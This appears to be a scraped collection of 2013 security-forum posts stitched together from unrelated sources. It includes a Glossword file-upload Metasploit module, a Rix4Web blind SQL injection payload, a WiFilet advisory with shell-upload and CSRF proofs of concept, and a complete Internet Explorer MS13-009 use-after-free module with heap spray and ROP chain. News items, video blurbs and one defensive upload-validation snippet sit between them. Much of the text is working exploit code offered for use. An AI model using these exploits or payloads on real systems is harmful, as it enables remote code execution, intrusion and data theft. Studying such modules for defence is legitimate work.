      'Name'           => "Glossword v1.8.8 - 1.8.12 Arbitrary File Upload Vulnerability",
      'Description'    => %q{
          This module exploits a file upload vulnerability in Glossword versions
        1.8.8 to 1.8.12 when run as a standalone application. This application
        has an upload feature that allows an authenticated user with
        administrator roles to upload arbitrary files to the 'gw_temp/a/' directory.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'AkaStep', # Discovery
          'Brendan Coles <bcoles[at]gmail.com>' # metasploit exploit
        ],
      'References'     =>
        [
          [ 'EDB', '24456' ],
          [ 'OSVDB', '89960' ] # comma was missing; without it Ruby concatenates the two strings
        ],
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [['Automatic Targeting', { 'auto' => true }]],
      'Privileged'     => true,
      'DisclosureDate' => "Feb 05 2013",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The path to the web application', '/glossword/1.8/']),
        OptString.new('USERNAME', [true, 'The username for Glossword', 'admin']),
        OptString.new('PASSWORD', [true, 'The password for Glossword', 'admin'])
      ], self.class)
  end

  def check
    base = target_uri.path
    peer = "#{rhost}:#{rport}"
    user = datastore['USERNAME']
    pass = datastore['PASSWORD']

    # login
    print_status("#{peer} - Authenticating as user '#{user}'")
    begin
      res = login(base, user, pass)
      if res
        if res.code == 200
          print_error("#{peer} - Authentication failed")
          return Exploit::CheckCode::Unknown
        elsif res.code == 301 and res.headers['set-cookie'] =~ /sid([\da-f]+)=([\da-f]{32})/
          print_good("#{peer} - Authenticated successfully")
          return Exploit::CheckCode::Appears
        end
      end
      return Exploit::CheckCode::Safe
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
      print_error("#{peer} - Connection failed")
    end
    return Exploit::CheckCode::Unknown
  end

  def on_new_session(client)
    if client.type == "meterpreter"
      client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
      client.fs.file.rm("#{@fname}")
    else
      client.shell_command_token("rm #{@fname}")
    end
  end

  def upload(base, sid, fname, file)
    user = datastore['USERNAME']
    pass = datastore['PASSWORD']
    data = Rex::MIME::Message.new
    data.add_part(file, 'application/x-php', nil, "form-data; name=\"file_location\"; filename=\"#{fname}\"")
    data.add_part("edit-own", nil, nil, 'form-data; name="a"')
    data.add_part("users", nil, nil, 'form-data; name="t"')
    data.add_part("Save", nil, nil, 'form-data; name="post"')
    data.add_part("#{sid}", nil, nil, 'form-data; name="sid"')
    data.add_part("#{user}", nil, nil, 'form-data; name="arPost[login]"')
    data.add_part("#{pass}", nil, nil, 'form-data; name="arPost[pass_new]"')
    data.add_part("#{pass}", nil, nil, 'form-data; name="arPost[pass_confirm]"')
    data_post = data.to_s
    data_post = data_post.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => normalize_uri(base, 'gw_admin.php'),
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => data_post,
    })
    return res
  end

  def login(base, user, pass)
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => normalize_uri(base, 'gw_login.php'),
      'data'   => "arPost%5Buser_name%5D=#{user}&arPost%5Buser_pass%5D=#{pass}&arPost%5Blocale_name%5D=en-utf8&a=login&sid=&post=Enter"
    })
    return res
  end

  def exploit
    base = target_uri.path
    @peer = "#{rhost}:#{rport}"
    @fname = rand_text_alphanumeric(rand(10)+6) + '.php'
    user = datastore['USERNAME']
    pass = datastore['PASSWORD']

    # login; get session id and token
    print_status("#{@peer} - Authenticating as user '#{user}'")
    res = login(base, user, pass)
    if res and res.code == 301 and res.headers['set-cookie'] =~ /sid([\da-f]+)=([\da-f]{32})/
      token = "#{$1}"
      sid = "#{$2}"
      print_good("#{@peer} - Authenticated successfully")
    else
      fail_with(Exploit::Failure::NoAccess, "#{@peer} - Authentication failed")
    end

    # upload PHP payload
    print_status("#{@peer} - Uploading PHP payload (#{payload.encoded.length} bytes)")
    php = %Q|<?php #{payload.encoded} ?>|
    begin
      res = upload(base, sid, @fname, php)
      if res and res.code == 301 and res['location'] =~ /Setting saved/
        print_good("#{@peer} - File uploaded successfully")
      else
        fail_with(Exploit::Failure::UnexpectedReply, "#{@peer} - Uploading PHP payload failed")
      end
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
      fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed")
    end

    # retrieve PHP file path
    print_status("#{@peer} - Locating PHP payload file")
    begin
      res = send_request_cgi({
        'method' => 'GET',
        'uri'    => normalize_uri(base, 'gw_admin.php?a=edit-own&t=users'),
        'cookie' => "sid#{token}=#{sid}"
      })
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
      fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed")
    end
    if res and res.code == 200 and res.body =~ /<img width="" height="" src="([^"]+)"/
      shell_uri = "#{$1}"
      @fname = shell_uri.match('(\d+_[a-zA-Z\d]+\.php)')
      print_good("#{@peer} - Found payload file path (#{shell_uri})")
    else
      fail_with(Exploit::Failure::UnexpectedReply, "#{@peer} - Failed to find PHP payload file path")
    end

    # retrieve and execute PHP payload
    print_status("#{@peer} - Executing payload (#{shell_uri})")
    begin
      # the response must be captured, otherwise the status check below
      # inspects the previous (gw_admin.php) response instead of this one
      res = send_request_cgi({
        'method' => 'GET',
        'uri'    => normalize_uri(base, shell_uri),
      })
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
      fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed")
    end
    if !res or res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{@peer} - Executing payload failed")
    end
  end
end

Source: Glossword v1.8.8 - 1.8.12 Arbitrary File Upload Vulnerability
-
Rix4Web Portal - Blind SQL Injection Vulnerability

################################################
### Exploit Title: Rix4Web Portal Remote Blind SQL Injection Vulnerability
### Date: 02/23/2013
### Author: L0n3ly-H34rT
### Contact: l0n3ly_h34rt@hotmail.com
### My Site: http://se3c.blogspot.com/
### Vendor Link: http://www.rix4web.com/
### Software Link: http://www.traidnt.net/vb/traidnt2230161/
### Tested on: Linux/Windows
################################################

# AND time-based blind In POST:

POST http://127.0.0.1/rix/add-site.php?do=addnew&go=add
cat_id=1&dir_link=http://www.google.com/' AND SLEEP(5) AND 'test'='test&dir_short=1&dir_title=Mr.

# Just inject : dir_link

################################################
# Greetz To My Friendz

Source: Rix4Web Portal - Blind SQL Injection Vulnerability
-
WiFilet version 1.2 suffers from cross site request forgery, local file inclusion, and remote shell upload vulnerabilities.

Title:
======
WiFilet v1.2 iPad iPhone - Multiple Web Vulnerabilities

Date:
=====
2013-02-22

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=867

VL-ID:
=====
867

Common Vulnerability Scoring System:
====================================
6.3

Introduction:
=============
WiFilet makes your iPhone/iPad a mobile disk; you can use browsers to upload or download files between iPhone/iPad and PC through WIFI.

* Easily sync music between computers and play it directly.
* Easily browse photo libraries via a web browser.
* Simple & handy UI
* Progress of the uploading files
* Open files (like images, word, excel, ppt etc.) directly in your device
* Share files by Email attachment
* Password protection
* ...

(Copy of the Homepage: https://itunes.apple.com/de/app/wifilet/id492512158 )

Abstract:
=========
The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the mobile WiFilet v1.2 app for the apple ipad & iphone.

Report-Timeline:
================
2013-02-22: Public Disclosure

Status:
========
Published

Affected Products:
==================
Apple AppStore
Product: WiFilet (WiFi) Application (iPad & iPhone) 1.2

Exploitation-Technique:
=======================
Remote

Severity:
=========
Critical

Details:
========
A local file include and arbitrary file upload web vulnerability via POST request method is detected in the mobile WiFilet v1.2 app for the apple ipad & iphone.
The vulnerability allows remote attackers via POST method to inject local app webserver folders to request unauthorized local webserver files.

1.1
The main vulnerability is located in the upload file script of the webserver (http://192.168.0.10:9999/) when processing to load a manipulated filename via POST request method.
The execution of the injected path or file request will occur when the attacker is watching the file index listing of the wifi web application web-server.

1.1.2
Remote attackers can also implement unauthorized mobile webshells by using multiple file extensions (pentest.php.js.gif) when processing to upload (submit) via POST request method.
The attacker uploads a file with a double extension and accesses the file in the second step via the webserver directory listing to compromise the apple iphone or ipad.

Exploitation of the local file include web vulnerability does not require user interaction and also no privileged user account.
Successful exploitation of the web vulnerabilities results in app/service manipulation and ipad or iphone compromise via file include or unauthorized file (webshell) upload attacks.

Vulnerable Application(s):
[+] WiFilet v1.2 - ITunes or AppStore (Apple)

Vulnerable Module(s):
[+] File Upload via Submit (Web Server) [Remote]

Vulnerable Parameter(s):
[+] file > filename

Affected Module(s):
[+] File Dir Index - Listing

1.2
A cross site request forgery web vulnerability is detected in the mobile WiFilet v1.2 app for the apple ipad & iphone.
The vulnerability allows remote attackers to form manipulated links or scripts to execute application functions when processing to load client side requests in the web browser.

The vulnerability is located in the application delete module and the not secure parsed file parameter. Remote attackers can force application users with a not expired session to execute application functions when processing to click a manipulated link.

Exploitation of the vulnerability requires medium or high user interaction without privileged application user account.
Successful exploitation of the vulnerability results in account steal via client side session hijacking, client side phishing, or client-side content request manipulation.

Vulnerable Application(s):
[+] WiFilet v1.2 - ITunes or AppStore (Apple)

Vulnerable Module(s):
[+] Delete

Vulnerable Module(s):
[+] file

Affected Module(s):
[+] File Dir - Listing

Proof of Concept:
=================
Both vulnerabilities can be exploited by remote attackers without privileged application user account and also without required user interaction.
For demonstration or reproduce ...

1.1 Local File/Path Include Web Vulnerability

Review: Index Listing

<tr><td title="../[FILE OR PATH REQUEST]<.png"><img src="/img/ext/png.png" align="absmiddle">
<a href="/down?f=6">../[FILE OR PATH REQUEST].png</a></td><td style="text-align:center;">2013-02-10 18:46</td>
<td>PNG Image</td><td><div title="27920" align="right">27,27 KB</div></td><td style="text-align:center;">
<button class="btn btn-danger" onclick="deleteFile("6")">Delete</button></td></tr>

PoC:

--- Session Log ---
[{"bytes":233966,"id":7,"name":"8765434.png","createDate":"2013-02-10 18:46","ext":"png","typeDesc":"file_type_png","size":"228,48 KB"},{"bytes":27920,"id":6,"name":"../[FILE OR PATH REQUEST].png","createDate":"2013-02-10 18:46","ext":"png","typeDesc":"file_type_png","size":"27,27 KB"},{"bytes":27920,"id":5,"name":"327.png","createDate":"2013-02-06 18:02","ext":"png","typeDesc":"file_type_png","size":"27,27 KB"},{"bytes":27920,"id":4,"name":"327.png","createDate":"2013-02-06 18:02","ext":"png","typeDesc":"file_type_png","size":"27,27 KB"}]
...

or

http://192.168.0.10:9999/photo?u=../[FILE OR PATH REQUEST]<

Reference(s):
http://192.168.0.10:9999/
http://192.168.0.10:9999/list?p=&t=1360518361029

1.1.2 Local File Upload Web Vulnerability

Review: Index Listing

<tbody>
<tr><td title="../[FILENAME+MULTIPLE EXTENSIONS].png.txt.iso.php.asp"><img src="/img/ext/file.png" align="absmiddle">
<a href="/../[FILENAME+MULTIPLE EXTENSIONS].png.txt.iso.php.asp">../[FILENAME+MULTIPLE EXTENSIONS].png.txt.iso.php.asp</a></td>
<td style="text-align:center;">2013-02-10 18:53</td><td>File</td><td><div title="98139" align="right">95,84 KB</div></td>
<td style="text-align:center;"><button class="btn btn-danger" onclick="deleteFile("8")">Delete</button></td></tr>
<tr><td title="8765434.png"><img src="/img/ext/png.png" align="absmiddle">
<a href="/down?f=7">8765434.png</a></td>
<td style="text-align:center;">2013-02-10 18:46</td><td>PNG Image</td><td><div title="233966" align="right">228,48 KB</div></td>
<td style="text-align:center;"><button class="btn btn-danger" onclick="deleteFile("7")">Delete</button></td></tr>
<tr><td title="327.png"><img src="/img/ext/png.png" align="absmiddle">
<a href="/down?f=6">327.png</a></td><td style="text-align:center;">2013-02-10 18:46</td><td>PNG Image</td><td><div title="27920" align="right">27,27 KB</div></td><td style="text-align:center;">
<button class="btn btn-danger" onclick="deleteFile("6")">Delete</button></td></tr>
<tr><td title="327.png"><img src="/img/ext/png.png" align="absmiddle">
<a href="/down?f=5">327.png</a></td><td style="text-align:center;">2013-02-06 18:02</td><td>PNG Image</td><td><div title="27920" align="right">27,27 KB</div></td><td style="text-align:center;">
<button class="btn btn-danger" onclick="deleteFile("5")">Delete</button></td></tr>
<tr><td title="327.png"><img src="/img/ext/png.png" align="absmiddle">
<a href="/down?f=4">327.png</a></td><td style="text-align:center;">2013-02-06 18:02</td><td>PNG Image</td><td><div title="27920" align="right">27,27 KB</div></td><td style="text-align:center;">
<button class="btn btn-danger" onclick="deleteFile("4")">Delete</button></td></tr>
</tbody>

Reference(s):
http://192.168.0.10:9999/

1.2
The client side cross site request forgery web vulnerability can be exploited by remote attackers without application user account and with medium or high required user interaction.
For demonstration or reproduce ...

<html>
<head><body>
<title>POC CSRF - Delete Files Exploit</title>
<Referer=http://192.168.0.10:9999/delete?f=9>
<Referer=http://192.168.0.10:9999/delete?f=9>
<Referer=http://http://192.168.0.10:9999/delete?f=1>
<Referer=http://http://192.168.0.10:9999/delete?f=2>
<Referer=http://http://192.168.0.10:9999/delete?f=3>
<Referer=http://http://192.168.0.10:9999/delete?f=4>
<Referer=http://http://192.168.0.10:9999/delete?f=5>
<Referer=http://http://192.168.0.10:9999/delete?f=6>
<Referer=http://http://192.168.0.10:9999/delete?f=7>
<Referer=http://http://192.168.0.10:9999/delete?f=8>
<Referer=http://http://192.168.0.10:9999/delete?f=9>
<Referer=http://http://192.168.0.10:9999/delete?f=10>
</body></head>
</html>

Risk:
=====
1.1
The security risk of the local path/file include web vulnerability via POST request method is estimated as critical.

1.1.2
The security risk of the arbitrary file upload web vulnerability via POST request method is estimated as high(+).

1.2
The security risk of the cross site request forgery web vulnerability via POST request method is estimated as low(+).

Credits:
========
Vulnerability Laboratory [Research Team] - Chokri Ben Achour (meister@vulnerability-lab.com)

Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register
Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.

Copyright © 2013 | Vulnerability Laboratory

--
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: research@vulnerability-lab.com

Original source: http://www.vulnerability-lab.com/get_content.php?id=867
Source: WiFilet 1.2 CSRF / LFI / Shell Upload - Packet Storm
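As an added defensive example (not part of the advisory above, nor code from Vulnerability-Lab, WiFilet, Kordil or Glossword), here is the server-side check an upload handler would run to refuse the two filename tricks that the WiFilet advisory (1.1 path injection into the listing, 1.1.2 multiple extensions such as pentest.php.js.gif) and the two Metasploit upload modules earlier on this page depend on: exactly one extension from an allow-list, a stem limited to characters that cannot form a path or break out of an HTML attribute, and a magic-byte check on the body so a script renamed to an image extension is still rejected. The image-only allow-list, the stem pattern and the sample names are assumptions chosen for this example.

```python
import re
from typing import Optional

# Allow-list of extensions this (assumed image-only) endpoint accepts.
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif"}

# Stem characters permitted in a stored name: nothing that can form a path
# or break out of an HTML attribute when the name is echoed into a listing.
_SAFE_STEM = re.compile(r"^[A-Za-z0-9_-]{1,64}$")

# Leading bytes a file body must carry for the extension it claims.
_MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
}


def sanitize_upload_name(filename: str) -> Optional[str]:
    """Return the name to store a client-supplied upload under, or None.

    Rejects path separators and traversal ("../x.png"), names with zero or
    more than one extension ("pentest.php.js.gif"), extensions outside the
    allow-list ("shell.php") and stems with characters outside _SAFE_STEM.
    A name is rejected outright rather than "cleaned", so the decision is
    easy to log and reason about.
    """
    if "/" in filename or "\\" in filename or "\x00" in filename:
        return None
    parts = filename.split(".")
    if len(parts) != 2:
        return None
    stem, ext = parts
    ext = ext.lower()
    if ext not in ALLOWED_EXTENSIONS or not _SAFE_STEM.match(stem):
        return None
    return f"{stem}.{ext}"


def content_matches_extension(data: bytes, ext: str) -> bool:
    """The body must start with the magic bytes of the declared type, so a
    script renamed to .gif is refused even though its name passed."""
    magic = _MAGIC.get(ext.lower())
    return magic is not None and data.startswith(magic)


def accept_upload(filename: str, data: bytes) -> Optional[str]:
    """Combined check an upload handler runs before writing anything to disk."""
    name = sanitize_upload_name(filename)
    if name is None:
        return None
    if not content_matches_extension(data, name.rsplit(".", 1)[1]):
        return None
    return name


if __name__ == "__main__":
    # Constructed sample names modelled on the patterns in the advisory.
    for candidate in ("8765434.png", "../secret.png", "pentest.php.js.gif",
                      "shell.php", "name<.png"):
        print(f"{candidate!r:32} -> {sanitize_upload_name(candidate)}")
```

Two further measures belong beside this check in a real handler: store the file under a server-generated name rather than the client's, and serve the upload directory from a location where the web server never executes scripts.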
-
A new Facebook virus is spreading in Romania. It promises to show you who viewed your profile

Many users in Romania complained about this scam over the weekend. A new scam that appeared on Facebook urges Romanians to click a link to see who viewed their profile. Unfortunately, all the curious ones who did so ended up with an infected account. This threat spread strongly in Romania over the weekend. Information security specialists say such scams are old, yet the number of people who fall for them remains high. They add that no Facebook application lets you see the people who view the information in your profile. Therefore, all posts promising such a thing are fake.

"No legitimate Facebook application allows users to see who views their profile. This scam leads to a fraud which, after countless surveys, redirects users to fake prizes of the latest phones. Scams of this kind have circulated on social networks for years, but they continue to claim victims among users, regardless of experience or age. They rely on social engineering mechanisms and psychological stimuli that prompt people to click quickly, without thinking about the consequences. Who doesn't want a prize in exchange for a single Facebook like? The scam steals the access tokens of a legitimate photo application, then posts on behalf of users, accessing their personal data. The malicious application spreads easily among the victim's friends, who are automatically tagged when the message is posted. Bitdefender blocks the malicious link, which it has flagged as fraud," says Catalin Cosoi, Chief Security Strategist at Bitdefender Romania.

Source: Un nou virus de Facebook ia amploare in Romania. Iti promite ca iti arata cine ti-a vazut profilul - www.yoda.ro
-
OffTopic: I'll leave you a link that will change your attitude a little once you read it. Click
OnTopic: Welcome!
-
Description: In this video I will show you how to use the Babelweb tool for HTTP server scanning as part of an audit. Babelweb is a program which allows you to automate tests on an HTTP server. It is able to follow links and HTTP redirects, but it is programmed to remain on the original server. The main goal of Babelweb is to obtain information about a remote web server and to sort that information. It is thus possible to draw up a list of the accessible pages, the CGI scripts encountered, and the various files found, like .zip, .pdf... Babelweb is written by Stéphane Aubert. HSC - Tools - Babelweb

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Original Source:

Source: Babelweb - Server Tester
-
Description: In this video I will show you how to use the Social Engineering Toolkit for a phishing attack and how to send a phishing mail that harvests credentials.

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Original Source:

Source: Fake Email + Phishing Social Engineering Toolkit
-
Updated to include Microsoft comment

Security software companies must be smiling ear to ear as they read the news briefs coming off the transom. Microsoft said today that an undetermined number of computers in its Mac software business unit got infected with malware. The company said the number of infected PCs was small but that there was no indication customer data had been compromised.

In a blog post late Friday, Matt Thomlinson, who directs the company's Trustworthy Computing Security program at Microsoft, wrote:

    Consistent with our security response practices, we chose not to make a statement during the initial information gathering process. During our investigation, we found a small number of computers, including some in our Mac business unit, that were infected by malicious software using techniques similar to those documented by other organizations. We have no evidence of customer data being affected and our investigation is ongoing. This type of cyberattack is no surprise to Microsoft and other companies that must grapple with determined and persistent adversaries (see our prior analysis of emerging threat trends). We continually re-evaluate our security posture and deploy additional people, processes, and technologies as necessary to help prevent future unauthorized access to our networks.

Welcome to the new normal. The escalating number of reported attacks was underscored by a recent report on malware put together by McAfee which reported that the number of trojans created to steal passwords rose about 72 percent in the last quarter.

Last week Apple said that an unknown number of Macs had been compromised, but that "there was no evidence any data left Apple." The malware was tied back to a site targeting iPhone developers. Employee computers for Facebook and most likely dozens of other companies were also breached. The incidents occurred roughly around the same time that The New York Times, The Wall Street Journal, and The Washington Post disclosed that outsiders had also targeted their employees' computers.

Source: Add Microsoft to list of hacked companies | Security & Privacy - CNET News
-
Description: In this episode of TekTip we take a look at performing basic static analysis with MASTIFF. While that is the focus of this episode, I wanted to delve into Maltrieve first. Maltrieve is a fork of MWCrawler, which you guys and gals may remember from a previous TekTip video. Maltrieve was created by Kyle Maxwell @KyleMaxwell. While it has the same basic function as MWCrawler, which is downloading malware from various web resources, it works much faster and pulls from more reliable web resources. @KyleMaxwell is working to add thug integration as well. MASTIFF is an automated framework for static analysis created by Tyler Hudak @SecShoggath and was funded by the DARPA Cyber Fast Track program. Too bad Cyber Fast Track is going away; there are so many awesome projects coming out of it right now. What MASTIFF does is analyze a file to determine its type (pdf, zip, PE32) and, based on that file type, run the appropriate static analysis tools against the sample. The output of the tools it runs is organized and packaged up, with some key information also making its way into a SQLite database.

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Original Source:

Source: Tektip Ep23 - Mastiff With A Splash Of Maltrieve
-
Description: In this video we continue with the DOM-based XSS attack.

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Original Source: https://vimeo.com/60358223

Source: Web Apps Security Series Part 3 - Dom Based Xss
-
Description: In this video I have explained how to use honeyd to create a honeypot.

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Original Source:

Source: Honeypot Using Honeyd
-
The Twitter account of the Anonymous hackers was hacked

The attack on the Anonymous account comes after a series of similar actions targeting the accounts of Burger King, Jeep and Top Gear presenter Jeremy Clarkson. In this case, the attack on the Anonymous account was claimed by a little-known group called Rustle League. Graham Cluley, an information security expert at the firm Sophos, says the reason these accounts are easy to break into is the passwords used, which are easy to guess. The same advice is given by Twitter's management, which advises users to come up with smarter passwords, BBC News writes. A secure password must have at least 10 characters and contain lowercase and uppercase letters, numbers and symbols. The Anonymous group's @Anon_Central account was hijacked for 3 hours on Thursday morning.

Source: Gruparea Anonymous, lovita de alti hackeri. Cine a lansat atacul - www.yoda.ro
-
Seniority and post count also matter, to gauge the person's interest in this community. If someone has had an account since 2008 (you, for example) with 2-3 posts, and not even the administrator has heard of you, how do you expect to get into the market? How do we tell whether you are trustworthy or not? I could make an account now, and years later turn up at the market and say I want to exchange LR for PP. Who would trust that? Rules are rules.
-
Description: A lot of times we download shellcode from sites like [ Shell-Storm.org ] | Home | and http://exploit-db.com but have no clue what it does. We believe what the shellcode description says and we are happy to run it. Would you trust a hacker? In this video, we look at the first step in how to systematically run and analyze shellcode. In the course of this video, we will discover that the shellcode in question uses a JMP-CALL-POP technique and uses XOR encoding to hide the real shellcode. We then move on to find the two syscalls it makes: setreuid and execve. Upon analysis of the syscall arguments, we figure out that the shellcode, after decoding itself, runs "/bin/ksh".

Link to Shellcode: Linux/x86 - setreuid (0,0) & execve(/bin/ksh, [/bin/ksh, NULL]) + XOR encoded - 53 bytes
Shellcode Author: https://twitter.com/@egeektronic

Source: Hack Of The Day: How Do I Run Untrusted Shellcode?
-
MS13-009 Microsoft Internet Explorer SLayoutRun Use-After-Free

Kwelwild posted a topic in Exploituri

This Metasploit module exploits a use-after-free vulnerability in Microsoft Internet Explorer where a CParaElement node is released but a reference is still kept in CDoc. This memory is reused when a CDoc relayout is performed.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::RopDb

  def initialize(info={})
    super(update_info(info,
      'Name'           => "MS13-009 Microsoft Internet Explorer SLayoutRun Use-After-Free",
      'Description'    => %q{
        This module exploits a use-after-free vulnerability in Microsoft Internet Explorer
        where a CParaElement node is released but a reference is still kept
        in CDoc. This memory is reused when a CDoc relayout is performed.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Scott Bell <scott.bell@security-assessment.com>' # Vulnerability discovery & Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2013-0025' ],
          [ 'MSB', 'MS13-009' ],
          [ 'URL', 'http://security-assessment.com/files/documents/advisory/ie_slayoutrun_uaf.pdf' ]
        ],
      'Payload'        =>
        {
          'BadChars'       => "\x00",
          'Space'          => 920,
          'DisableNops'    => true,
          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
        },
      'DefaultOptions' =>
        {
          'InitialAutoRunScript' => 'migrate -f'
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Automatic', {} ],
          [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => 0x5f4 } ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Feb 13 2013",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
      ], self.class)
  end

  def get_target(agent)
    #If the user is already specified by the user, we'll just use that
    return target if target.name != 'Automatic'

    nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
    ie = agent.scan(/MSIE (\d)/).flatten[0] || ''

    ie_name = "IE #{ie}"

    case nt
    when '5.1'
      os_name = 'Windows XP SP3'
    end

    targets.each do |t|
      if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
        print_status("Target selected as: #{t.name}")
        return t
      end
    end

    return nil
  end

  def heap_spray(my_target, p)
    js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
    js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))

    js = %Q|
    var heap_obj = new heapLib.ie(0x20000);
    var code = unescape("#{js_code}");
    var nops = unescape("#{js_nops}");
    while (nops.length < 0x80000) nops += nops;
    var offset = nops.substring(0, #{my_target['Offset']});
    var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
    while (shellcode.length < 0x40000) shellcode += shellcode;
    var block = shellcode.substring(0, (0x80000-6)/2);
    heap_obj.gc();
    for (var i=1; i < 0x300; i++) {
      heap_obj.alloc(block);
    }
    var overflow = nops.substring(0, 10);
    |

    js = heaplib(js, {:noobfu => true})

    if datastore['OBFUSCATE']
      js = ::Rex::Exploitation::JSObfu.new(js)
      js.obfuscate
    end

    return js
  end

  def get_payload(t, cli)
    code = payload.encoded

    # No rop. Just return the payload.
    return code if t['Rop'].nil?

    # ROP chain generated by mona.py - See corelan.be
    case t['Rop']
    when :msvcrt
      print_status("Using msvcrt ROP")
      rop_nops = [0x77c39f92].pack("V") * 11 # RETN
      rop_payload = generate_rop_payload('msvcrt', "", {'target'=>'xp'})
      rop_payload << rop_nops
      rop_payload << [0x77c364d5].pack("V") # POP EBP # RETN
      rop_payload << [0x77c15ed5].pack("V") # XCHG EAX, ESP # RETN
      rop_payload << [0x77c35459].pack("V") # PUSH ESP # RETN
      rop_payload << [0x77c39f92].pack("V") # RETN
      rop_payload << [0x0c0c0c8c].pack("V") # Shellcode offset
      rop_payload << code
    end

    return rop_payload
  end

  def get_exploit(my_target, cli)
    p  = get_payload(my_target, cli)
    js = heap_spray(my_target, p)

    html = %Q|
    <!doctype html>
    <html>
    <head>
    <script>
    #{js}
    </script>
    <script>
    var data;
    var objArray = new Array(1150);
    setTimeout(function(){
      document.body.style.whiteSpace = "pre-line";
      CollectGarbage();
      for (var i=0;i<1150;i++){
        objArray[i] = document.createElement('div');
        objArray[i].className = data += unescape("%u0c0c%u0c0c");
      }
      setTimeout(function(){document.body.innerHTML = "boo"}, 100)
    }, 100)
    </script>
    </head>
    <body>
    <p> </p>
    </body>
    </html>
    |

    return html
  end

  def on_request_uri(cli, request)
    agent = request.headers['User-Agent']
    uri   = request.uri
    print_status("Requesting: #{uri}")

    my_target = get_target(agent)
    # Avoid the attack if no suitable target found
    if my_target.nil?
      print_error("Browser not supported, sending 404: #{agent}")
      send_not_found(cli)
      return
    end

    html = get_exploit(my_target, cli)
    html = html.gsub(/^\t\t/, '')

    print_status "Sending HTML..."
    send_response(cli, html, {'Content-Type'=>'text/html'})
  end

end

Source: MS13-009 Microsoft Internet Explorer SLayoutRun Use-After-Free - Packet Storm
-
Rix4Web Portal suffers from a remote SQL injection vulnerability.

################################################
### Exploit Title: Rix4Web Portal Remote Blind SQL Injection Vulnerability
### Date: 02/23/2013
### Author: L0n3ly-H34rT
### Contact: l0n3ly_h34rt@hotmail.com
